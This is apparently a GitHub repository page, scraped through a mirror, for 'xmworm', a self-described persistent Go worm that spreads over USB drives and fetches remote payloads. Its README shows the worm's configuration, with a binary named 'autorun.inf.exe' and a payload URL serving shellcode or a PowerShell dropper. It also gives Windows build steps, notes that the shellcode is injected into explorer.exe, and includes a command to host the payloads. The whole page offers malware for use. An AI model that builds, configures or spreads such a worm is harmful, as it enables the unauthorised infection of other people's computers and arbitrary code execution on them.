Thanks to visit codestin.com
Credit goes to github.com

Skip to content

champ243/xmworm

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
drives
drives
 
 
files
files
 
 
infect
infect
 
 
injector
injector
 
 
install
install
 
 
payload
payload
 
 
shell
shell
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
go.mod
go.mod
 
 
go.sum
go.sum
 
 
main.go
main.go
 
 

Repository files navigation

xmworm

A persistent Go based USB spreading worm, with remote payload fetching ability

setup

Configure

$ vim main.go
// main.go

func main(){
	
	worm := &Worm{
		binaryName: "autorun.inf.exe", 
		maxScanInterval: 5,
		//payloadURL: "http://localhost:8005/dropper.ps1",

		// https://www.exploit-db.com/shellcodes/49819
		// `payload.bin` is in `payload/payload.bin` sub-directory,
		// it is raw-binary shellcode that pops calc.exe
		payloadUrl: "http://localhost:8005/payload.bin",
		payloadType: "shellcode",
	}

Set the payload url, and payload type you want in the worm's config structure.

  • there are currently two supported payload types: powershell, and shellcode
  • powershell is simple powershell script
  • shellcode is raw binary shellcode, which will be loaded in explorer.exe on target system

Build

git clone https://github.com/r0psteev/xmworm.git

cd ./xmworm

GOOS=windows GOARCH=amd64 go build .

Start webserver on embedded test payloads

$ cd ./payload
$ python3 -m http.server 8005

About

A persistent Go based USB spreading worm, with remote payload fetching ability

Resources

Readme

License

GPL-3.0 license
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • Go 100.0%